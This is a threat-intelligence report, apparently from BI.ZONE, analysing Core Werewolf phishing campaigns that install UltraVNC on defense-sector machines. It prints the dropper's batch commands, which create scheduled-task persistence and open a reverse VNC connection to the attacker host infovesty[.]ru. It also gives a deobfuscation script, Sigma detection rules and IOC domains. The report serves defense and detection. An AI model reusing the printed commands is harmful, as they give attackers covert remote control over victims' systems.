Core Werewolf targets the defense industry and critical infrastructure
Like many other threat actors, Core Werewolf relies on legitimate tools to achieve its goals. After gaining an initial foothold through phishing emails, the group obtains remote access with UltraVNC, a legitimate remote administration program, without deploying any malware at all.
In this article, we will explore the life cycle of the detected Core Werewolf attacks, look into the tactics, techniques, and procedures employed to compromise the target systems, and describe the group’s infrastructure.
The file used in the first attack that we uncovered was uploaded to VirusTotal on August 6, 2021. Notably, the malicious files were always disguised as Microsoft Word or PDF documents by means of a double extension, even though they were self-extracting archives, that is, executables. For example, Прил._7_критерии_оценки_...ГУВП.docx.exe (Appendix 7. Assessment criteria). The decoy document shown to the user looked genuine, so nothing raised suspicion, while opening the file silently installed UltraVNC in the background. This gave the attackers complete control over the compromised devices.
The file discovered first contained an order of a defense organization (fig. 1).
The file detected next was posted on December 16, 2021. The phishing document included an internal order by one of the largest joint-stock companies in Russia (fig. 2).
There was a lull before the next attack. The file was spotted on April 12, 2022 and contained a resume (fig. 3).
The file from the next attack was uploaded on April 18, 2022 and targeted the employees of some defense organizations (fig. 4).
Another file was posted on April 27, 2022 and was dedicated to the military discharge (fig. 5).
In their new attack, with the respective file uploaded on May 8, 2022, the criminals again attached an order of a defense organization (fig. 6).
On May 12, 2022, a new file was published on VirusTotal. This time, the attackers sent methodological recommendations of another defense organization (fig. 7).
The file uploaded on May 27, 2022 again contained an order (fig. 8).
The summer attacks started with a file posted on June 13, 2022. Disguised as a decree of the Government of the Russian Federation, the document amended the state regulation of prices for products supplied under the state defense order (fig. 9).
The next attack, with the file uploaded on June 28, 2022, used some guidelines to victimize the users (fig. 10).
July was marked by an attack that leveraged a document issued by the Department of the Federal Service for Technical and Export Control (FSTEK) of Russia for the Northwestern Federal District. It described the measures to reinforce the protection of information infrastructure facilities in Russia.
The file published on VirusTotal on July 20, 2022 contained another administrative document related to the defense sector.
The file uploaded on July 27, 2022 came as a resume, yet of a different person (fig. 11).
In August, the criminals once again used an order as a phishing document (fig. 12).
In September, the attackers went even further and, instead of some regular order, attached a document marked “For official use only.”
The October attack featured yet another decree of the Government of the Russian Federation. The document introduced amendments to the national program on the development of the nuclear power industry (fig. 13).
The first attack in November (the malicious file was uploaded on November 2) used a cooling supply diagram for a special-purpose high-performance computing cluster.
On the following day, a new file was posted, this time containing a set of diagrams.
The next attack in November employed the group’s favored type of document, that is, related to defense industry operations (fig. 14).
The December attack was once again focused on the defense sector employees (fig. 15).
The first attack in 2023 used a request form as a phishing document (fig. 16).
The next attack also took place in January. The phishing document contained methodological recommendations on granting deferment from call-up during mobilization and wartime to Russian citizens in the military reserve who work for certain organizations (fig. 17).
In February 2023, the attackers got back to sending resumes as phishing documents (fig. 18).
In March 2023, Core Werewolf once again attached a copy of a document meant for official use only.
On March 20, 2023, one more file was uploaded to VirusTotal with the phishing document targeting defense industry personnel.
April 2023 saw the group’s repeated attempt to use a resume for phishing purposes (fig. 19).
The attack that occurred in May featured yet another order (fig. 20).
In each of the campaigns the devices were compromised in the same way, so the tactics, techniques, and procedures described below apply to all of the attacks. Let us walk through the compromise process using the attack recorded in May 2023 as an example.
After the victim opens the file НУВП награждение полный.doc.exe (a list of award nominees), the self-extracting archive unpacks its contents and runs a batch script that performs the following actions:
- Delayed expansion of environment variables is enabled:
setlocal enabledelayedexpansion
- Environment variables are set; their values are later concatenated to build the file names and UltraVNC arguments, which keeps the telltale strings out of the script body:
set sc46w96z76M16f76I86i96V16v56I76f56I06Z96V96q56O6=%COMPUTERNAME%
set ce18Z18w88q18r38o78t58x68i38P08J48m38I48y18s78S3=%RANDOM%
set Ue30z00l70K30B90i00V80E40J00K80D10w50M40t00Y30F3=nuvp
set MW17A27X27F57f77y07Q47R47j27J47g77d37a17Q77X07W8=doc
set BG15f35o55V85I95V75e65y55O85h75G55f75r45o35M55p4=Virtual
set Bo94Y44b04y64n44b34B24A04Y94e84x94h94z34q34e04b9=autore
set kM49J49K89y79Z49y39K09C99m69z29E79N49L89a39A39s6=connect
set mz70v70R90L60L20r00s90G00d80V40A20u20I90j80S00y4=443
set SF53S43Q83F33Z73M63X03N83i63i73x73F13r93p13S23v9=infovesty[.]ru
set ua60e50a30E10w90T60U60q10h70Z80C60d90x10P30Y10J3=exe
- A task is created in the Windows Task Scheduler to terminate the process Virtual.exe daily:
schtasks /create /f /tn "OneDrive Purge Task-S-1-5-21-3177791385" /tr "taskkill /f /im Virtual.exe" /sc daily /st 09:02
- The script pauses for 2 seconds:
timeout /t 2
- The decoy document is copied from the extracted archive contents (stored under an obfuscated name) to the parent directory:
copy /y "%CD%\go67x37i77J07R07W37O07G77J37T67z77l07H67z87w77M9.VH64z44L84J44O04O24a44d54X64C64q74c44R94y54y74R4" "%CD%\..\nuvp.doc"
- The script pauses for 4 seconds:
timeout /t 4
- The copied decoy document is opened, so the victim sees the content they expected:
start "" "%CD%\..\nuvp.doc"
- The UltraVNC server executable is copied from the extracted archive contents under the name Virtual.exe:
copy /y "su22Q42Y62S62R72m92H32I82n02z12w72T72M82T82a92q9.HH75f05T55A55m95l65z65l05u15d05y85o15n45E95i25L3" "Virtual.exe"
- A task is created in the Windows Task Scheduler to run Virtual.exe daily:
schtasks /create /f /tn "OneDrive Init Task-I-2-5-22-8712003127" /tr "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\7ZipSfx.000\Virtual.exe" /sc daily /st 09:03
- Any running Virtual.exe process is terminated:
taskkill /f /im Virtual.exe
- The UltraVNC configuration file is copied into place:
copy /y "UltraVNC.ini" "UltraVNC.ini"
- Virtual.exe is started:
start "" "Virtual.exe"
- A task is created in the Windows Task Scheduler to start UltraVNC daily with the attacker's server specified. The -connect argument makes the VNC server initiate an outbound (reverse) connection to a listening viewer at infovesty[.]ru on port 443, -autoreconnect re-establishes it if it drops, and -id labels the session with the host name and a random number:
schtasks /create /f /tn "OneDrive Update Task-U-3-5-23-6820155392" /tr "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\7ZipSfx.000\Virtual.exe -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect infovesty[.]ru:443" /sc daily /st 09:04
- UltraVNC is started immediately with the same arguments:
start "" "%CD%\Virtual.exe" -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect infovesty[.]ru:443
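The variable-based obfuscation above is simple to undo once the `set` lines are in hand: every fragment is concatenated back into a file name or an argument. The script below, an added example rather than code from the article or from the dropper, expands such references. The `set` lines are the ones quoted above; the two obfuscated command lines and the COMPUTERNAME and RANDOM values are constructed to show how the fragments (nuvp + . + doc, Virtual + . + exe, autore + connect) are stitched together, they are not the dropper's literal lines.

```python
"""Expand cmd.exe commands assembled from obfuscating environment variables.

Added example, not code from the BI.ZONE write-up or from the Core Werewolf
dropper. SET_TEXT holds the `set` lines quoted in the article; OBFUSCATED and
ENV are constructed for illustration.
"""
import re

SET_TEXT = """
set sc46w96z76M16f76I86i96V16v56I76f56I06Z96V96q56O6=%COMPUTERNAME%
set ce18Z18w88q18r38o78t58x68i38P08J48m38I48y18s78S3=%RANDOM%
set Ue30z00l70K30B90i00V80E40J00K80D10w50M40t00Y30F3=nuvp
set MW17A27X27F57f77y07Q47R47j27J47g77d37a17Q77X07W8=doc
set BG15f35o55V85I95V75e65y55O85h75G55f75r45o35M55p4=Virtual
set Bo94Y44b04y64n44b34B24A04Y94e84x94h94z34q34e04b9=autore
set kM49J49K89y79Z49y39K09C99m69z29E79N49L89a39A39s6=connect
set mz70v70R90L60L20r00s90G00d80V40A20u20I90j80S00y4=443
set SF53S43Q83F33Z73M63X03N83i63i73x73F13r93p13S23v9=infovesty[.]ru
set ua60e50a30E10w90T60U60q10h70Z80C60d90x10P30Y10J3=exe
"""

# Constructed stand-ins for the values cmd.exe would supply at run time.
ENV = {"COMPUTERNAME": "WS-01", "RANDOM": "12345"}

# Constructed obfuscated command lines in delayed-expansion !VAR! syntax
# (the dropper runs `setlocal enabledelayedexpansion`). %CD% is left alone.
OBFUSCATED = [
    'start "" "%CD%\\..\\!Ue30z00l70K30B90i00V80E40J00K80D10w50M40t00Y30F3!'
    '.!MW17A27X27F57f77y07Q47R47j27J47g77d37a17Q77X07W8!"',
    'start "" "%CD%\\!BG15f35o55V85I95V75e65y55O85h75G55f75r45o35M55p4!'
    '.!ua60e50a30E10w90T60U60q10h70Z80C60d90x10P30Y10J3!"'
    ' -!Bo94Y44b04y64n44b34B24A04Y94e84x94h94z34q34e04b9!'
    '!kM49J49K89y79Z49y39K09C99m69z29E79N49L89a39A39s6!'
    ' -id:!sc46w96z76M16f76I86i96V16v56I76f56I06Z96V96q56O6!'
    '_!ce18Z18w88q18r38o78t58x68i38P08J48m38I48y18s78S3!'
    ' -!kM49J49K89y79Z49y39K09C99m69z29E79N49L89a39A39s6!'
    ' !SF53S43Q83F33Z73M63X03N83i63i73x73F13r93p13S23v9!'
    ':!mz70v70R90L60L20r00s90G00d80V40A20u20I90j80S00y4!',
]

SET_RE = re.compile(r"^\s*set\s+([^=]+)=(.*)$", re.IGNORECASE)
REF_RE = re.compile(r"[%!]([A-Za-z0-9_]+)[%!]")


def expand(command, table, max_rounds=8):
    """Replace %VAR% and !VAR! references from `table`, repeating until the
    string stops changing so that values which themselves hold references
    get resolved. Names missing from the table are left as written so they
    stay visible to the analyst (a real batch run would expand an undefined
    variable to an empty string)."""
    for _ in range(max_rounds):
        new = REF_RE.sub(lambda m: table.get(m.group(1), m.group(0)), command)
        if new == command:
            break
        command = new
    return command


def parse_set_lines(text, env=None):
    """Build the variable table from `set NAME=VALUE` lines. Values may refer
    to variables defined earlier in the script or supplied via `env`."""
    table = dict(env or {})
    for line in text.splitlines():
        m = SET_RE.match(line)
        if m:
            table[m.group(1).strip()] = expand(m.group(2), table)
    return table


def deobfuscate(set_text, commands, env=None):
    """Return the commands with every variable reference expanded."""
    table = parse_set_lines(set_text, env)
    return [expand(c, table) for c in commands]


if __name__ == "__main__":
    for line in deobfuscate(SET_TEXT, OBFUSCATED, ENV):
        print(line)
```

Running it yields the two commands in the form shown above, with the host name and random number filled in. The same approach works for any dropper that hides strings in variables, provided the `set` lines are collected first; variables defined through `for` loops or computed with `set /a` would need the expander extended.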
This way the attackers not only gain access to the compromised system after the victim opens the malicious file, but also establish persistence by scheduling the tasks. Legitimate software enables the adversaries to gain complete control over the compromised device. In particular, they can copy and exfiltrate files as well as track the user’s actions.
The attackers spread their domain registrations across several Russian and foreign registrars rather than relying on a single one, namely:
- Regtime
- REG.RU
- Ukrainian Internet Names Center
- Soaring Eagle Domains
- Realtime Register
- Wild West Domains
- OnlineNIC
- GoDaddy
The adversaries used Russian names to register the domain names, for example, Aleksandr Vladimirovich Petrishev, as well as email addresses hosted by popular Russian services—mail.ru and yandex.ru. They also used mobile telephone numbers provided by online services that enabled them to receive text messages (fig. 21).
It should be noted that the attackers tended to rent servers located in Russia. Since the targets were Russian organizations, connections to Russian hosting did not stand out, which reduced the chances of the servers being blocklisted or the activity being detected early.
The Russian-Ukrainian crisis has significantly affected the global threat landscape and demonstrated that prevention alone is not enough: threats must also be actively hunted for. Adversaries keep inventing new evasion methods and tend to abandon malware in favor of legitimate tools, including those built into the operating system. Such methods have once again proved effective in the human-operated attacks conducted by APT groups.
Despite the attackers’ using legitimate programs, it is still possible to identify malicious activity in the course of compromise and neutralize the attack in early stages.
The intruders make ample use of the Windows Task Scheduler, including for the daily termination of the UltraVNC process with taskkill. Note that cmd.exe is the parent of the schtasks.exe process that creates the task. Since such a combination is far from typical, it can assist in detection:
title: Taskkill Abuse via Task Scheduler
id: c0b32533-ba84-4ce9-9be6-d5e5d024bf03
status: experimental
description: Detects taskkill abuse via Task Scheduler as seen in Core Werewolf campaigns
references:
    - https://bi.zone/eng/expertise/blog/core-werewolf-protiv-opk-i-kriticheskoy-infrastruktury
author: BI.ZONE
date: 2023/05/30
tags:
    - attack.execution
    - attack.t1053.005
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\cmd.exe'
        Image|endswith: '\schtasks.exe'
        CommandLine|contains|all:
            - 'taskkill'
            - ' /f'
            - ' /im '
    condition: selection
fields:
    - ParentImage
    - Image
    - CommandLine
level: medium
Likewise, the Task Scheduler is used to start UltraVNC daily, and the attackers pass it a specific set of arguments (-autoreconnect, -id, -connect). These arguments can be detected with the following rule:
title: Scheduled Task for Malicious UltraVNC
id: dd963a36-cb22-4925-8a94-fc9a9abfb65d
status: experimental
description: Detects scheduled task creation for UltraVNC as seen in Core Werewolf campaigns
references:
    - https://bi.zone/eng/expertise/blog/core-werewolf-protiv-opk-i-kriticheskoy-infrastruktury
author: BI.ZONE
date: 2023/05/30
tags:
    - attack.execution
    - attack.t1053.005
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\cmd.exe'
        Image|endswith: '\schtasks.exe'
        CommandLine|contains|all:
            - 'autoreconnect '
            - 'connect '
            - 'id'
    condition: selection
fields:
    - ParentImage
    - Image
    - CommandLine
level: medium
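To see what the two rules above do and do not catch, the script below evaluates their selections against a handful of process-creation events. This is an added example, not BI.ZONE's code: it implements only the two Sigma modifiers the rules use (endswith and contains|all, with Sigma's default case-insensitive matching), and the events are constructed, loosely modelled on Sysmon Event ID 1 fields, with the two malicious command lines taken from the schtasks invocations described in this article.

```python
"""Evaluate the two Sigma rules from the article against sample events.

Added example, not BI.ZONE's code. The EVENTS below are constructed; the
matcher covers only the `endswith` and `contains|all` modifiers.
"""

RULES = {
    "Taskkill Abuse via Task Scheduler": {
        "ParentImage|endswith": "\\cmd.exe",
        "Image|endswith": "\\schtasks.exe",
        "CommandLine|contains|all": ["taskkill", " /f", " /im "],
    },
    "Scheduled Task for Malicious UltraVNC": {
        "ParentImage|endswith": "\\cmd.exe",
        "Image|endswith": "\\schtasks.exe",
        "CommandLine|contains|all": ["autoreconnect ", "connect ", "id"],
    },
}


def field_matches(event, key, expected):
    """One Sigma selection entry, FIELD|modifier[|modifier], against an event.
    Sigma string matching is case-insensitive by default, so both sides are
    lower-cased before comparison."""
    field, *mods = key.split("|")
    value = str(event.get(field, "")).lower()
    if mods == ["endswith"]:
        return value.endswith(expected.lower())
    if mods == ["contains", "all"]:
        return all(s.lower() in value for s in expected)
    raise ValueError(f"modifier chain not implemented: {key}")


def match_rules(event, rules=RULES):
    """Names of the rules whose whole selection matches (condition: selection)."""
    return [name for name, sel in rules.items()
            if all(field_matches(event, k, v) for k, v in sel.items())]


SYSTEM32 = "C:\\Windows\\System32\\"

# Constructed events, modelled on Sysmon Event ID 1 fields.
EVENTS = [
    {   # 0: the daily taskkill task created by the dropper
        "ParentImage": SYSTEM32 + "cmd.exe",
        "Image": SYSTEM32 + "schtasks.exe",
        "CommandLine": 'schtasks /create /f /tn "OneDrive Purge Task-S-1-5-21-3177791385" '
                       '/tr "taskkill /f /im Virtual.exe" /sc daily /st 09:02',
    },
    {   # 1: the daily UltraVNC reverse-connection task created by the dropper
        "ParentImage": SYSTEM32 + "cmd.exe",
        "Image": SYSTEM32 + "schtasks.exe",
        "CommandLine": 'schtasks /create /f /tn "OneDrive Update Task-U-3-5-23-6820155392" '
                       '/tr "C:\\Users\\user\\AppData\\Local\\Temp\\7ZipSfx.000\\Virtual.exe '
                       '-autoreconnect -id:WS-01_12345 -connect infovesty[.]ru:443" '
                       '/sc daily /st 09:04',
    },
    {   # 2: benign admin task, same parent/child pair, no suspicious arguments
        "ParentImage": SYSTEM32 + "cmd.exe",
        "Image": SYSTEM32 + "schtasks.exe",
        "CommandLine": 'schtasks /create /tn "NightlyBackup" /tr "C:\\Tools\\backup.exe" '
                       '/sc daily /st 02:00',
    },
    {   # 3: the same taskkill task, but created from PowerShell (outside the rules' scope)
        "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "Image": SYSTEM32 + "schtasks.exe",
        "CommandLine": 'schtasks /create /f /tn "Purge" /tr "taskkill /f /im Virtual.exe" '
                       '/sc daily /st 09:02',
    },
]


def scan(events=EVENTS):
    """Return {event index: [matched rule names]} for events hitting any rule."""
    hits = {}
    for i, event in enumerate(events):
        matched = match_rules(event)
        if matched:
            hits[i] = matched
    return hits


if __name__ == "__main__":
    for index, names in scan().items():
        print(index, names)
```

Events 0 and 1 each trigger exactly one rule, the benign backup task triggers none, and event 3 shows the limit of the `ParentImage|endswith: '\cmd.exe'` constraint: the identical taskkill task created from PowerShell is not covered, so a hunt should also look at the scheduled-task action itself (for example via Security event 4698 or the task XML) rather than only at the process tree. Note too that the `id` token in the second rule contributes almost nothing on its own; the specificity comes from `autoreconnect ` together with the cmd.exe to schtasks.exe pairing.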
Domains used in the attacks:
- clodmail.ru
- seemsurprise.com
- moscowguarante.com
- linux-tech-world.net
- linux-techworld.com
- linux-tech-world.com
- getvalerianllc.com
- bitsbfree.com
- licensecheckout.net
- win32soft.com
- microsoftsupertech.com
- microsofttechinfo.com
- autotimesvc.com
- msk-gov.com
- samssmgr.com
- versusmain.com
- savebrowsing.net
- statusgeotrust.com
- contileservices.net
- tapiservicemgr.com
- microsoftdownloaderonline.com
- microsoftdownloadonline.com
- microsoftdownloader.com
- cortanaupdater.net
- cortanaupdater.com
- checkerserviceonline.net
- checkerserviceonline.com
- softsandtools.com
- sensauto.info
- softdownloaderonline.net
- softdownloaderonline.com
- uploadingonline.com
- uploadeonline.com
- uploaderonline.com
- webupdateronline.net
- webupdateronline.com
- winuptodate.com
- winupdateonline.com
- winupdateronline.com
- webengincs.com
- exactsynchtime.ru
- licensecheckout.com
- servicehost-update.net
- passportyandex.net
More indicators of compromise are available with BI.ZONE Threat Intelligence.
The number of attacks against companies that rely on legitimate tools is constantly growing. Such attacks often slip past preventive security tools, which lets threat actors gain access to the infrastructure unnoticed. To discover this type of intrusion, we recommend that companies implement cyber threat detection, response, and prevention solutions, such as BI.ZONE TDR, as part of their SOC.